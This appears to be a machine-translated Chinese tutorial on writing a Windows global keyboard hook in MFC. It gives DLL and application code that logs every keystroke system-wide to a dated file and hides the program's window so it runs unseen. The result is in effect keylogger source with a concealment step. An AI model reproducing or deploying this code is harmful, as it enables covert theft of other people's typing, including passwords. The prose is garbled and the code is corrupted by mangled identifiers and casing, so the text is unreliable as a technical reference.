Using keyboard hooks to capture keyboard action information under Windows platform, the 22nd Institute, Qingdao, Qingdao, Lang Rui 01-5-24 02:50:39
I. Introduction
We can capture keyboard operations on this program window in the application, but if we want to make this program into a monitor, capture keyboard operations on any window in Windows Platform, you need to use it. The global hook is achieved.
Second, system hooks and DLL
The essence of the hook is a program used to handle system messages, and hang it into the system through system call. There are many types of hooks, each hook can intercept and process the corresponding message, whenever a specific message is issued, before arriving at the target window, the hook program will intercept the message to obtain the control of this message. At this point, the intercepted message can be processed, and even the passage of the message can be enforced.
In this program, we need to capture keyboard inputs on any window, which requires global hooks to intercept messages of the entire system, and global hook functions must be encapsulated in DLL (dynamic connection libraries), and there are three forms in VC6. The MFC DLL is optional, namely Regular StaticLinked to MFC DLL (Static Link MFC DLL), Regular Using The Shared MFC DLL (Standard Dynamic Link MFC DLL), and Extension MFC DLL (Extension MFC DLL). The standard static connection MFC DLL is used for convenience in this program.
Third, the keyboard hook program example
This sample program uses a global hook function, and the program is divided into two parts: executable program Keyhook and dynamic connection library LaunchDLL.
1. First, the MFC extension dynamic connection library LaunchDll.dll:
(1) Select the MFC AppWizard (DLL) to create a project launchDLL; select Regular StaticLinked to MFC DLL in the next option.
(2) Declaration of macro definitions in launchdll.h and the declaration of the function to be exported:
#define dllexport __declspec (dllexport)
......
Dllexport void WinApi installlaunchev ();
......
Class ClaunchDLAPP: Public CWINAPP
{
PUBLIC:
ClaunchDLLAPP ();
// {{AFX_VIRTUAL (CLAUNCHDLLAPP)
//}} AFX_VIRTUAL
// {{AFX_MSG (ClaunchDLLAPP)
// Note - The ClassWizard Will Add and Remove Member functions here.
// Do Not Edit What You See in these Blocks of generated code!
//}} AFX_MSG
Declare_message_map ()
}
(3) Add global variable hook and global functions in LaunchDLL.CPP Launcherhook, SAVELOG:
Hhook hook;
Lresult Callback Launcherhook (Int Ncode, WPARAM WPARAM, LPARAM LPARAM);
Void savelog (char * c);
(4) Complete the implementation of these functions mentioned above:
......
ClaunchDLlapp theApp;
......
Dllexport void WinApi installlaunchev ()
{
Hook = (hHOOK) SETWINDOWSHOKEX (Wh_Keyboard,
(HookProc) Launcherhook,
THEAPP.M_HINSTANCE,
0);
}
Here we implement the installation of Windows system hooks, first to call the API function setWindowsHookex in the SDK to install this hook function, its prototype is:
HHOOK SETWINDOWSHOKEX (Int IDHOOK,
HookProc LPFN,
Hinstance hmod,
DWORD DWTHREADID);
Among them, the first parameter specifies the type of hook, which is commonly used with wh_mouse, wh_keyboard, wh_getMessage, etc. We only care about the keyboard operation, set to wh_keyboard; the second parameter identifies the entrance address of the hook function, when the hook hook to any This function is called after the message, that is, when there is a keyboard input, the keyboard input is immediately caused; the third parameter is the handle of the module where the hook function is located, and we can set it as an instance of this application. Handle; the last parameter is the ID of the hook-related function to specify which thread wants to hook the hook. When 0 is 0, the message is intercepted, in this program, the hook needs to be a global hook, so it is set to 0.
......
Lresult Callback Launcherhook (Int Ncode, WPARAM WPARAM, LPARAM LPARAM)
{
LResult Result = CallNextHookex (Hook, Ncode, WPARAM, LPARAM);
IF (ncode == hc_action)
{
IF (lparam & 0x80000000)
{
Char C [1];
C [0] = WPARAM;
SAVELOG (C);
}
}
Return Result;
}
Although call callNexThooKex () is optional, the habit of calling this function is worth recommending; otherwise, other applications that have the hooks installing the hook will not receive the notification of the hook and may generate incorrect results. So we should try to call this function unless absolutely needs to prevent other programs from obtaining notifications.
......
Void savelog (char * c)
{
CTIMETM = CTIME :: getcurrenttime ();
CString name;
Name.Format ("C: //key_%d_%d.log", TM.GETMONTH (), TM.GETDAY ());
CFILE FILE;
IF (! file.open (name, cfile :: modeReadwrite))
{
File.open (name, cfile :: modecreate | cfile :: modeReadwrite);
}
File.seektoend ();
File.write (C, 1);
File.Close ();
}
When the key bomb is up, the bounced key is saved to the record file to realize the purpose of monitoring the keyboard.
Compile completion of the keyboard hook dynamic connection library LaunchDLL.DLL required for runtime and LaunchDll.lib for static links.
2, start writing the main program called this dynamic connection library and achieve final integration:
(1) Create a project keyhook with MFC AppWizard (Exe);
(2) Select a single document, and the rest can be safe;
(3) Copy launchdll.h and launchdll.lib to the Keyhook Engineering Directory, LaunchDLL.DLL is copied to the debug directory.
(4) Link the DLL library, that is, in "Project", "settings ..." "LINK" property page, in "Object / LibraryModules:", "LaunchModules" is filled in "LaunchModules". By "Project", "Add to Project", "Files ..." adds launchdll.h to the project, and finally add reference to it in the source file of the view class: #include "launchdll.h"
This way we can use all export functions in dynamic connection library launchdll.dll like using functions in this project.
(5) Add a virtual function onInitialUpdate () in the view class, and add the code to complete the installation of the keyboard hook:
......
INSTALLLAUNCHEV ();
......
(6) In fact, all functions have been completed, but as a background monitoring software, it does not want an interface when running, and can m_pmainwnd-> showwindow in the initInstance () function of the application class ckeyhookappp;; Change to m_pmainwnd-> showwindow (sw_hide);
Fourth, operation and testing
Compiling running programs, there is no phenomenon after running, but through Alt Ctrl Del In the Close Program dialog box, you can find "Keyhook" we just write, please enter characters through the keyboard in what program, then open the record File, we will find: Through the keyboard hook, the characters we just entered are recorded in the record file.
Summary: The system hook has a considerable function, and this technology can intercept, monitor, and process almost all Windows system messages. This technology is widely used in various automatic monitoring systems.
